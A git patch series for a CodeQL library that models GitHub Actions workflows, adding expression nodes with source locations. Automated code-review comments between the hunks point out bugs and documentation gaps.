 /** Gets the `job` this step belongs to, if the step belongs to a `job` in a workflow. Has no result if the step belongs to `runs` in a custom composite action. */
- Job getJob() { result = parent }
+ Job getJob() { result.asYamlNode() = parent }
 /** Gets the value of the `if` field in this step, if any. */
- If getIf() { result = super.lookup("if") }
+ If getIf() { result.asYamlNode() = this.asYamlMapping().lookup("if") }
 }
 /**
  * An If node representing a conditional statement.
  */
-class If extends AstNode {
- YamlMapping parent;
+class If extends WorkflowNode {
+ WorkflowNode parent;
 If() {
 (parent instanceof Step or parent instanceof Job) and
- parent.lookup("if") = this
+ parent.asYamlMapping().lookup("if") = this.asYamlNode()
 }
- AstNode getEnclosingNode() { result = parent }
+ WorkflowNode getEnclosingNode() { result = parent }
- string getCondition() { result = this.(YamlScalar).getValue() }
+ string getCondition() { result = this.asYamlNode().(YamlScalar).getValue() }
 }
 /**
  * Abstract class representing a call to a 3rd party action or reusable workflow.
  */
-abstract class Uses extends AstNode {
+abstract class Uses extends WorkflowNode {
 abstract string getCallee();
 abstract string getVersion();
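Review bot: `Step()` is the one constructor in this commit that does not gain the `n instanceof YamlMapping` guard its siblings (`Runs`, `Outputs`, `Permissions`, `Strategy`) received, so a scalar element of a `steps:` list becomes a `Step` whose `getId()`, `getIf()` and other `asYamlMapping()`-based lookups silently have no result; `Step() { n instanceof YamlMapping and parent.lookup("steps").(YamlSequence).getElementNode(_) = this.asYamlNode() }` matches the rest of the file. `If` now declares `WorkflowNode parent` and immediately narrows it with `parent instanceof Step or parent instanceof Job`, which is fine, but `getCondition()` hands back the scalar verbatim, with or without a `${{ }}` wrapper; a one-line note such as `/** Gets the raw condition text, exactly as written in the YAML. */` would save callers a trip into the YAML library.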
@@ -385,7 +468,7 @@ private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } class UsesStep extends Step, Uses { YamlScalar uses; - UsesStep() { this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = "uses"), uses) } + UsesStep() { this.asYamlMapping().maps(any(YamlScalar s | s.getValue() = "uses"), uses) } /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ override string getCallee() { @@ -400,7 +483,7 @@ class UsesStep extends Step, Uses { override string getVersion() { result = uses.getValue().regexpCapture(usesParser(), 3) } override StringLiteral getArgument(string key) { - result = this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) + result.asYamlNode() = this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) } override string toString() { @@ -411,8 +494,11 @@ class UsesStep extends Step, Uses { /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class UsesJob extends Uses instanceof YamlMapping { - UsesJob() { this instanceof Job and this.maps(any(YamlString s | s.getValue() = "uses"), _) } +class UsesJob extends Uses { + UsesJob() { + this instanceof Job and + this.asYamlMapping().maps(any(YamlString s | s.getValue() = "uses"), _) + } Job getJob() { result = this } @@ -428,7 +514,7 @@ class UsesJob extends Uses instanceof YamlMapping { override string getCallee() { exists(YamlString name | - super.lookup("uses") = name and + this.asYamlMapping().lookup("uses") = name and if name.getValue().matches("./%") then result = name.getValue().regexpCapture(this.pathUsesParser(), 1) else 
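Review bot: `usesParser()` (`([^/]+)/([^/@]+)@(.+)`, shown in this hunk's context) requires exactly two path segments before the `@`, so a `uses:` reference into a subdirectory such as `owner/repo/path/to/action@v1`, or a `docker://image:tag` reference, produces no `getCallee()`/`getVersion()` result for a `UsesStep`; a query that reports unpinned or untrusted actions would then silently skip those steps instead of flagging them. If I read the regex right, `([^/]+)/([^/@]+)(?:/[^@]*)?@(.+)` keeps groups 1–3 intact while accepting the subdirectory form, and docker references probably deserve a separate branch rather than a `none()`. The `UsesStep` class begins in this hunk and its body continues past the visible hunks.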
@@ -442,7 +528,7 @@ class UsesJob extends Uses instanceof YamlMapping { /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { exists(YamlString name | - super.lookup("uses") = name and + this.asYamlMapping().lookup("uses") = name and if not name.getValue().matches("\\.%") then result = name.getValue().regexpCapture(this.repoUsesParser(), 4) else none() @@ -450,7 +536,7 @@ class UsesJob extends Uses instanceof YamlMapping { } override StringLiteral getArgument(string key) { - super.lookup("with").(YamlMapping).lookup(key) = result + this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) = result.asYamlNode() } } @@ -461,7 +547,7 @@ class UsesJob extends Uses instanceof YamlMapping { class Run extends Step { StringLiteral script; - Run() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = "run"), script) } + Run() { this.asYamlMapping().maps(any(YamlString s | s.getValue() = "run"), script.asYamlNode()) } StringLiteral getScript() { result = script } @@ -473,18 +559,19 @@ class Run extends Step { /** * A YamlString part of a YamlSequence or YamlMapping values. */ -class StringLiteral extends AstNode instanceof YamlString { +class StringLiteral extends WorkflowNode { StringLiteral() { + n instanceof YamlString and exists(YamlCollection c | c instanceof YamlMapping and - c.(YamlMapping).maps(_, this) + c.(YamlMapping).maps(_, this.asYamlNode()) or c instanceof YamlSequence and - c.(YamlSequence).getElementNode(_) = this + c.(YamlSequence).getElementNode(_) = this.asYamlNode() ) } - string getValue() { result = this.(YamlString).getValue() } + string getValue() { result = this.asYamlNode().(YamlString).getValue() } } /** 
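Review bot: `UsesJob.getVersion()` decides "local reference" with `matches("\\.%")` (any value starting with `.`) while `getCallee()` in the preceding hunk uses `matches("./%")`; for a reusable-workflow reference both should be the same test, and `./` is the form the workflow syntax actually accepts, so using `matches("./%")` in both places, or a private `isLocalReference()` predicate shared by the two, removes the drift. In `StringLiteral()`, the `c instanceof YamlMapping and ... or c instanceof YamlSequence and ...` body relies on `and` binding tighter than `or`; parenthesising each arm makes the grouping obvious to the next reader.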
@@ -508,7 +595,7 @@ string getASimpleReferenceExpression(YamlString node) { class Expression extends StringLiteral { string expr; - Expression() { expr = getASimpleReferenceExpression(this) } + Expression() { expr = getASimpleReferenceExpression(this.asYamlNode()) } string getExpression() { result = expr } @@ -529,7 +616,7 @@ class ContextExpression extends Expression { abstract string getFieldName(); - abstract AstNode getTarget(); + abstract WorkflowNode getTarget(); } private string stepsCtxRegex() { @@ -574,7 +661,7 @@ class StepsExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { + override WorkflowNode getTarget() { this.getLocation().getFile() = result.getLocation().getFile() and result.(Step).getId() = stepId } @@ -601,7 +688,7 @@ class NeedsExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { + override WorkflowNode getTarget() { neededJob.getLocation().getFile() = this.getLocation().getFile() and this.getJob().getANeededJob() = neededJob and ( @@ -631,7 +718,7 @@ class JobsExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { + override WorkflowNode getTarget() { exists(Job job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and @@ -655,7 +742,7 @@ class InputsExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { + override WorkflowNode getTarget() { result.getLocation().getFile() = this.getLocation().getFile() and ( exists(ReusableWorkflow w | w.getInput(fieldName) = result) 
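Review bot: `StepsExpression.getTarget()` resolves `steps.<id>` by file and step id only (`this.getLocation().getFile() = result.getLocation().getFile() and result.(Step).getId() = stepId`), but step ids are scoped to a job, so a workflow whose jobs reuse an id such as `build` makes an expression in one job resolve to the same-named step of every other job in the file. Requiring the same enclosing job for workflow steps while keeping the file match for composite actions — roughly `result.(Step).getJob() = this.getJob() or not exists(result.(Step).getJob())`, assuming the `getJob()` that `NeedsExpression.getTarget` in the next hunk already calls is available here — pins the target to the step that actually ran, instead of letting a tainted step elsewhere in the file stand in for a clean one.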
@@ -680,8 +767,8 @@ class EnvExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { - exists(AstNode s | + override WorkflowNode getTarget() { + exists(WorkflowNode s | s.getEnvVar(fieldName) = result and s.getAChildNode*() = this ) @@ -703,7 +790,7 @@ class MatrixExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { + override WorkflowNode getTarget() { exists(Workflow w | w.getStrategy().getMatrixVar(fieldName) = result and w.getAChildNode*() = this From 96246f4b74cd050d2f9b919e9aadf7f626de6041 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 7 Mar 2024 15:35:47 +0100 Subject: [PATCH 087/707] Add Expression nodes and their corresponding locations --- .gitignore | 1 + ql/lib/codeql/Locations.qll | 59 ++- ql/lib/codeql/actions/Ast.qll | 353 ++++++++----- ql/lib/codeql/actions/ast/internal/Yaml.qll | 9 +- .../actions/controlflow/internal/Cfg.qll | 27 +- .../codeql/actions/dataflow/ExternalFlow.qll | 10 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 12 +- .../dataflow/internal/DataFlowPublic.qll | 4 +- ...el.yml => actions_github-script.model.yml} | 4 +- .../Security/CWE-020/CompositeActionsSinks.ql | 2 +- .../CWE-020/CompositeActionsSources.ql | 2 +- .../CWE-020/CompositeActionsSummaries.ql | 2 +- .../CWE-020/ReusableWorkflowsSinks.ql | 2 +- .../CWE-020/ReusableWorkflowsSources.ql | 2 +- .../CWE-020/ReusableWorkflowsSummaries.ql | 2 +- .../CWE-094/CriticalExpressionInjection.ql | 5 +- .../Security/CWE-094/ExpressionInjection.ql | 5 +- ql/src/Security/CWE-829/UntrustedCheckout.ql | 3 +- .../.github/workflows/expression_nodes.yml | 22 + ql/test/library-tests/test.expected | 250 ++++++++- ql/test/library-tests/test.ql | 8 +- .../CWE-020/CompositeActionsSinks.expected | 18 +- .../CWE-020/CompositeActionsSources.expected | 12 +- .../CompositeActionsSummaries.expected | 12 +- .../CWE-020/ReusableWorkflowsSinks.expected | 6 +- .../CWE-020/ReusableWorkflowsSources.expected | 12 +- .../ReusableWorkflowsSummaries.expected | 18 +- .../.github/workflows/comment_issue.yml | 4 +- .../workflows/comment_issue_newline.yml | 4 +- .../CriticalExpressionInjection.expected | 463 ++++++++--------- .../CWE-094/ExpressionInjection.expected | 480 +++++++++--------- 32 files changed, 1113 insertions(+), 702 deletions(-) rename ql/lib/ext/{PLACEHOLDER.model.yml => actions_github-script.model.yml} (57%) create mode 100644 ql/test/library-tests/.github/workflows/expression_nodes.yml 
diff --git a/.gitignore b/.gitignore index 6c0e5c58738d..1127e8f55db1 100644 --- a/.gitignore +++ b/.gitignore @@ -3,3 +3,4 @@ ql/lib/.codeql/ ql/src/.codeql/ ql/test/.codeql/ +db/ diff --git a/ql/lib/codeql/Locations.qll b/ql/lib/codeql/Locations.qll index 3a16bdec40d2..33a8eba30acb 100644 --- a/ql/lib/codeql/Locations.qll +++ b/ql/lib/codeql/Locations.qll @@ -1,6 +1,7 @@ /** Provides classes for working with locations. */ import files.FileSystem +import codeql.actions.Ast bindingset[loc] pragma[inline_late] 
@@ -11,30 +12,57 @@ private string locationToString(Location loc) { ) } +newtype TLocation = + TBaseLocation(string filepath, int startline, int startcolumn, int endline, int endcolumn) { + exists(File file | + file.getAbsolutePath() = filepath and + locations_default(_, file, startline, startcolumn, endline, endcolumn) + ) + or + exists(ExpressionNode e | + e.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) + ) + or + filepath = "" and startline = 0 and startcolumn = 0 and endline = 0 and endcolumn = 0 + } + /** * A location as given by a file, a start line, a start column, * an end line, and an end column. * * For more information about locations see [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). */ -class Location extends @location_default { +class Location extends TLocation, TBaseLocation { + string filepath; + int startline; + int startcolumn; + int endline; + int endcolumn; + + Location() { this = TBaseLocation(filepath, startline, startcolumn, endline, endcolumn) } + /** Gets the file for this location. */ - File getFile() { locations_default(this, result, _, _, _, _) } + File getFile() { + exists(File file | + file.getAbsolutePath() = filepath and + result = file + ) + } /** Gets the 1-based line number (inclusive) where this location starts. */ - int getStartLine() { locations_default(this, _, result, _, _, _) } + int getStartLine() { result = startline } /** Gets the 1-based column number (inclusive) where this location starts. */ - int getStartColumn() { locations_default(this, _, _, result, _, _) } + int getStartColumn() { result = startcolumn } - /** Gets the 1-based line number (inclusive) where this location ends. */ - int getEndLine() { locations_default(this, _, _, _, result, _) } + /** Gets the 1-based line number (inclusive) where this.getLocationDefault() location ends. 
*/ + int getEndLine() { result = endline } - /** Gets the 1-based column number (inclusive) where this location ends. */ - int getEndColumn() { locations_default(this, _, _, _, _, result) } + /** Gets the 1-based column number (inclusive) where this.getLocationDefault() location ends. */ + int getEndColumn() { result = endcolumn } /** Gets the number of lines covered by this location. */ - int getNumLines() { result = this.getEndLine() - this.getStartLine() + 1 } + int getNumLines() { result = endline - startline + 1 } /** Gets a textual representation of this element. */ pragma[inline] @@ -47,13 +75,12 @@ class Location extends @location_default { * For more information, see * [Providing locations in CodeQL queries](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). */ - predicate hasLocationInfo( - string filepath, int startline, int startcolumn, int endline, int endcolumn - ) { - exists(File f | - locations_default(this, f, startline, startcolumn, endline, endcolumn) and - filepath = f.getAbsolutePath() - ) + predicate hasLocationInfo(string p, int sl, int sc, int el, int ec) { + p = filepath and + sl = startline and + sc = startcolumn and + el = endline and + ec = endcolumn } /** Holds if this location starts strictly before the specified location. */ diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 1d86d81a063e..21d4f052e130 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -3,7 +3,9 @@ private import codeql.Locations newtype TAstNode = TWorflowNode(YamlNode n) or - TExpressionNode() + TExpressionNode(StringValue n, string expression, int exprOffset) { + expression = getASimpleReferenceExpression(n, exprOffset) + } class AstNode extends TAstNode { abstract AstNode getAChildNode(); 
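Review bot: The doc comments on the new `getEndLine()` and `getEndColumn()` now read "where this.getLocationDefault() location ends", which looks like a stray search-and-replace; restore them to `/** Gets the 1-based line number (inclusive) where this location ends. */` and the matching column wording. The `TBaseLocation` branch `filepath = "" and startline = 0 and ...` creates a placeholder location whose `getFile()` has no result, which callers of `Location.getFile()` will not expect; a one-line comment such as `// empty placeholder location (no file); getFile() has no result for it` would make that deliberate. `getFile()` itself can be written as `result.getAbsolutePath() = filepath` without the `exists`.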
@@ -12,21 +14,160 @@ class AstNode extends TAstNode { abstract string getAPrimaryQlClass(); + abstract string toString(); + abstract Location getLocation(); - abstract string toString(); + abstract File getFile(); + + /** + * Gets the enclosing workflow statement. + */ + Workflow getEnclosingWorkflow() { this = result.getAChildNode*() } + + /** + * Gets a environment variable expression by name in the scope of the current node. + */ + ExpressionNode getInScopeEnvVarExpr(string name) { + exists(StringValue l, Env env | + env.asYamlMapping().maps(any(YamlScalar s | s.getValue() = name), l.asYamlNode()) and + l.getAnExpression() = result + | + env.(StepEnv).getStep().getAChildNode*() = this + or + env.(JobEnv).getJob().getAChildNode*() = this + or + env.(WorkflowEnv).getWorkflow().getAChildNode*() = this + ) + } } class ExpressionNode extends AstNode, TExpressionNode { - override string toString() { result = "expression node" } + StringValue n; + string rawExpression; + string expression; + int exprOffset; + + ExpressionNode() { + this = TExpressionNode(n, rawExpression, exprOffset - 1) and + expression = + rawExpression.regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + } + + override string toString() { result = expression } override AstNode getAChildNode() { none() } - override AstNode getParentNode() { none() } + override AstNode getParentNode() { result = n } override string getAPrimaryQlClass() { result = "ExpressionNode" } - override Location getLocation() { none() } + string getExpression() { result = expression } + + string getRawExpression() { result = rawExpression } + + Job getJob() { result.getAChildNode*() = n } + + int lineLength(int idx) { + exists(string line | line = n.getValue().splitAt("\n", idx) and result = line.length() + 1) + } + + bindingset[i] + int unboundPartialLineLengthSum(int i) { + result = sum(int j, int length | j in [0 .. 
i] and length = this.lineLength(j) | length) + } + + int partialLineLengthSum(int i) { + i in [0 .. count(n.getValue().splitAt("\n"))] and + result = this.unboundPartialLineLengthSum(i) + } + + predicate expressionOffsets(int sl, int sc, int el, int ec) { + exists(int lineDiff, string style, Location loc | + loc = n.asYamlNode().getLocation() and + lineDiff = loc.getEndLine() - loc.getStartLine() and + style = n.asYamlNode().(YamlString).getStyle() + | + // eg: + // - run: echo "hello" + // - run: 'echo "hello"' + // - run: "echo 'hello'" + style = ["", "\"", "'"] and + lineDiff = 0 and + sl = loc.getStartLine() and + el = sl and + sc = loc.getStartColumn() + exprOffset and + ec = sc + rawExpression.length() - 1 + or + // eg: + // - run: "echo 'hello' + // echo 'hello'" + // - run: "echo 'hello' + // echo 'hello' + // echo 'hello'" + style = ["", "\"", "'"] and + lineDiff > 0 and + sl = loc.getStartLine() and + el = loc.getEndLine() and + sc = loc.getStartColumn() and + ec = loc.getEndColumn() + or + // eg: + // - run: | + // echo "hello" + // - run: | + // echo "hello" + // echo "bye" + style = "|" and + exists(int r | + ( + r > 0 and + this.partialLineLengthSum(r - 1) < exprOffset and + this.partialLineLengthSum(r) >= exprOffset and + sl = loc.getStartLine() + r + 1 and + el = sl and + sc = + n.getKeyNode().getLocation().getStartColumn() + exprOffset - + this.partialLineLengthSum(r - 1) + 2 - 1 and + ec = sc + rawExpression.length() - 1 + or + r = 0 and + this.partialLineLengthSum(r) > exprOffset and + sl = loc.getStartLine() + r + 1 and + el = sl and + sc = n.getKeyNode().getLocation().getStartColumn() + 2 + exprOffset and + ec = sc + rawExpression.length() - 1 + ) + ) + or + // eg: + // - run: > + // echo "hello" + // - run: > + // echo "hello" + // echo "hello" + style = ">" and + sl = loc.getStartLine() + 1 and + el = loc.getEndLine() and + sc = n.getKeyNode().getLocation().getStartColumn() and + ec = loc.getEndColumn() + ) + } + + override Location 
getLocation() { + exists(Location loc | + this.hasLocationInfo(loc.getFile().getAbsolutePath(), loc.getStartLine(), + loc.getStartColumn(), loc.getEndLine(), loc.getEndColumn()) and + result = loc + ) + } + + predicate hasLocationInfo(string path, int sl, int sc, int el, int ec) { + path = n.asYamlNode().getFile().getAbsolutePath() and + this.expressionOffsets(sl, sc, el, ec) + } + + override File getFile() { result = n.asYamlNode().getFile() } } /** @@ -39,37 +180,23 @@ class WorkflowNode extends AstNode, TWorflowNode { override AstNode getParentNode() { result = TWorflowNode(n.getParentNode()) } - override AstNode getAChildNode() { result = TWorflowNode(n.getAChildNode()) } + override AstNode getAChildNode() { + result = TWorflowNode(n.getAChildNode()) + or + exists(ExpressionNode e | e.getParentNode() = this | result = e) + } override string getAPrimaryQlClass() { result = n.getAPrimaryQlClass() } override Location getLocation() { result = n.getLocation() } - override string toString() { result = n.toString() } - - /** - * Gets the enclosing workflow statement. - */ - Workflow getEnclosingWorkflow() { this = result.getAChildNode*() } - - /** - * Gets a environment variable expression by name in the scope of the current node. - */ - StringLiteral getEnvVar(string name) { - exists(Env env | - env.asYamlMapping().maps(any(YamlScalar s | s.getValue() = name), result.asYamlNode()) - | - env.(StepEnv).getStep().getAChildNode*() = this - or - env.(JobEnv).getJob().getAChildNode*() = this - or - env.(WorkflowEnv).getWorkflow().getAChildNode*() = this - ) - } + override File getFile() { result = n.getFile() } YamlNode asYamlNode() { result = n } YamlMapping asYamlMapping() { result = n } + + override string toString() { result = n.toString() } } /** A common class for `env` in workflow, job or step. */ 
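Review bot: In `expressionOffsets` the two `style = "|"` branches compute the start column differently: for `r > 0` it is `keyColumn + exprOffset - partialLineLengthSum(r - 1) + 2 - 1`, but for `r = 0` the trailing `- 1` is missing (`keyColumn + 2 + exprOffset`), so, if I read `exprOffset` correctly as 1-based after the `exprOffset - 1` shift in the constructor, expressions on the first line of a block scalar land one column too far right; the branches should agree, e.g. `sc = n.getKeyNode().getLocation().getStartColumn() + 2 + exprOffset - 1`. Both branches also hard-code `+ 2` as the block scalar's indentation relative to its key, which YAML does not guarantee (4-space indents or an explicit indentation indicator like `|2` are legal), so at minimum add `// assumes the block scalar body is indented exactly 2 columns past its key` so the limitation is visible to whoever sees mislocated alerts. The character class in the `ExpressionNode` constructor regex contains `\\((\\)` where the `regexpFind` pattern in `getASimpleReferenceExpression` uses `\\(\\)`; inside a class the extra `(` is harmless, but the two should be identical.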
@@ -117,7 +244,7 @@ class CompositeAction extends WorkflowNode { CompositeAction() { n instanceof YamlDocument and n instanceof YamlMapping and - this.getLocation().getFile().getBaseName() = ["action.yml", "action.yaml"] and + this.getFile().getBaseName() = ["action.yml", "action.yaml"] and this.asYamlMapping().lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" } @@ -127,9 +254,9 @@ class CompositeAction extends WorkflowNode { Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } - StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } + ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } - StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } + ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } Input getAnInput() { this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) @@ -214,9 +341,9 @@ class ReusableWorkflow extends Workflow { Outputs getOutputs() { result.asYamlNode() = workflow_call.(YamlMapping).lookup("outputs") } - StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } + ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } - StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } + ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } Input getAnInput() { workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) 
@@ -245,17 +372,19 @@ class Outputs extends WorkflowNode { /** * Gets an output expression. */ - StringLiteral getAnOutput() { - this.asYamlMapping().lookup(_).(YamlMapping).lookup("value") = result.asYamlNode() or - this.asYamlMapping().lookup(_) = result.asYamlNode() - } + ExpressionNode getAnOutputExpr() { result = this.getOutputExpr(_) } /** * Gets a specific output expression by name. */ - StringLiteral getOutput(string name) { - this.asYamlMapping().lookup(name).(YamlMapping).lookup("value") = result.asYamlNode() or - this.asYamlMapping().lookup(name) = result.asYamlNode() + ExpressionNode getOutputExpr(string name) { + exists(StringValue l | + l.getAnExpression() = result and + ( + this.asYamlMapping().lookup(name).(YamlMapping).lookup("value") = l.asYamlNode() or + this.asYamlMapping().lookup(name) = l.asYamlNode() + ) + ) } string getAnOutputName() { @@ -285,14 +414,14 @@ class Strategy extends WorkflowNode { /** * Gets a specific matric expression (YamlMapping) by name. */ - StringLiteral getMatrixVar(string name) { + StringValue getMatrixVar(string name) { this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(name) = result.asYamlNode() } /** * Gets a specific matric expression (YamlMapping) by name. */ - StringLiteral getAMatrixVar() { + StringValue getAMatrixVar() { this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(_) = result.asYamlNode() } } 
@@ -312,17 +441,7 @@ class Needs extends WorkflowNode { Job getANeededJob() { result.getId() = this.asYamlNode().(YamlMappingLikeNode).getNode(_).(YamlString).getValue() and - result.getLocation().getFile() = job.getLocation().getFile() - // if this instanceof YamlString - // then - // result.getId() = this.(YamlString).getValue() and - // result.getLocation().getFile() = job.getLocation().getFile() - // else - // if this instanceof YamlSequence - // then - // result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and - // result.getLocation().getFile() = job.getLocation().getFile() - // else none() + result.getFile() = job.getFile() } } @@ -378,9 +497,9 @@ class Job extends WorkflowNode { */ Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } - StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } + ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } - StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } + ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } /** * Reusable workflow jobs may have Uses children @@ -448,7 +567,7 @@ abstract class Uses extends WorkflowNode { abstract string getVersion(); - abstract StringLiteral getArgument(string key); + abstract ExpressionNode getArgumentExpr(string key); override string toString() { result = "Uses Step" } } 
@@ -482,8 +601,11 @@ class UsesStep extends Step, Uses { /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { result = uses.getValue().regexpCapture(usesParser(), 3) } - override StringLiteral getArgument(string key) { - result.asYamlNode() = this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) + override Expression getArgumentExpr(string key) { + exists(StringValue l | + l.asYamlNode() = this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) and + result = l.getAnExpression() + ) } override string toString() { @@ -535,8 +657,11 @@ class UsesJob extends Uses { ) } - override StringLiteral getArgument(string key) { - this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) = result.asYamlNode() + override ExpressionNode getArgumentExpr(string key) { + exists(StringValue l | + this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) = l.asYamlNode() and + result = l.getAnExpression() + ) } } @@ -545,11 +670,11 @@ class UsesJob extends Uses { * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. */ class Run extends Step { - StringLiteral script; + StringValue script; Run() { this.asYamlMapping().maps(any(YamlString s | s.getValue() = "run"), script.asYamlNode()) } - StringLiteral getScript() { result = script } + StringValue getScript() { result = script } override string toString() { if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" 
@@ -559,19 +684,29 @@ class Run extends Step { /** * A YamlString part of a YamlSequence or YamlMapping values. */ -class StringLiteral extends WorkflowNode { - StringLiteral() { +class StringValue extends WorkflowNode { + YamlNode keyNode; + + StringValue() { n instanceof YamlString and exists(YamlCollection c | - c instanceof YamlMapping and - c.(YamlMapping).maps(_, this.asYamlNode()) - or - c instanceof YamlSequence and - c.(YamlSequence).getElementNode(_) = this.asYamlNode() + c = keyNode and + ( + c instanceof YamlMapping and + //c.(YamlMapping).maps(_, this.asYamlNode()) + exists(int i | this.asYamlNode() = c.(YamlMapping).getValueNode(i)) + or + c instanceof YamlSequence and + c.(YamlSequence).getElementNode(_) = this.asYamlNode() + ) ) } string getValue() { result = this.asYamlNode().(YamlString).getValue() } + + YamlNode getKeyNode() { result = keyNode } + + ExpressionNode getAnExpression() { result = this.getAChildNode() } } /** 
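Review bot: `keyNode` in the new `StringValue` class is bound to the enclosing `YamlCollection` (`c = keyNode`, the mapping or sequence that contains the value), not to a key, so `getKeyNode()` misleads callers such as `expressionOffsets`, which use its start column as if it were the key's column; rename it (`container` / `getContainerNode()`) or document it with `/** Gets the mapping or sequence this string is a value of; note this is the collection, not the key. */`. The commented-out `//c.(YamlMapping).maps(_, this.asYamlNode())` should be deleted rather than left beside its replacement `getValueNode(i)`. The class doc could also mention that `getAnExpression()` yields the `${{ }}` expressions embedded in the string value, since that is now the main way the injection queries reach them.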
@@ -580,27 +715,16 @@ class StringLiteral extends WorkflowNode { * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} */ -string getASimpleReferenceExpression(YamlString node) { +string getASimpleReferenceExpression(StringValue node, int offset) { // We use `regexpFind` to obtain *all* matches of `${{...}}`, // not just the last (greedy match) or first (reluctant match). result = node.getValue() - .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, _) - .regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) } -/** - * A StringLiteral containing a workflow expression ${{}}. - */ -class Expression extends StringLiteral { - string expr; - - Expression() { expr = getASimpleReferenceExpression(this.asYamlNode()) } - - string getExpression() { result = expr } - - Job getJob() { result.getAChildNode*() = this } -} +class Expression extends ExpressionNode { } /** * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. @@ -608,15 +732,16 @@ class Expression extends StringLiteral { */ class ContextExpression extends Expression { ContextExpression() { - expr.regexpMatch([ - stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), - matrixCtxRegex() - ]) + expression + .regexpMatch([ + stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), + matrixCtxRegex() + ]) } abstract string getFieldName(); - abstract WorkflowNode getTarget(); + abstract AstNode getTarget(); } private string stepsCtxRegex() { 
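Review bot: The doc comment above `getASimpleReferenceExpression` still says the expression "contains only alphanumeric characters, underscores, dots, or dashes", but the character class also admits `[`, `]`, `*`, `(` and `)`, so e.g. `${{ toJSON(github.event) }}` is matched as a "simple" expression; update the comment to list the full set and to state that forms with string literals, commas, `||` or quoted index expressions remain unmodelled, since those are exactly the injection-prone shapes a query author will ask about. The capture regex's class contains `\\((\\)` while the `regexpFind` pattern uses `\\(\\)`; the stray `(` is redundant inside a class, but keeping the two patterns in one shared private predicate would stop them drifting apart. The new `offset` parameter is the 0-based `regexpFind` offset, which the `ExpressionNode` constructor then shifts by one, so the predicate doc should say `offset` is 0-based within the string value.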
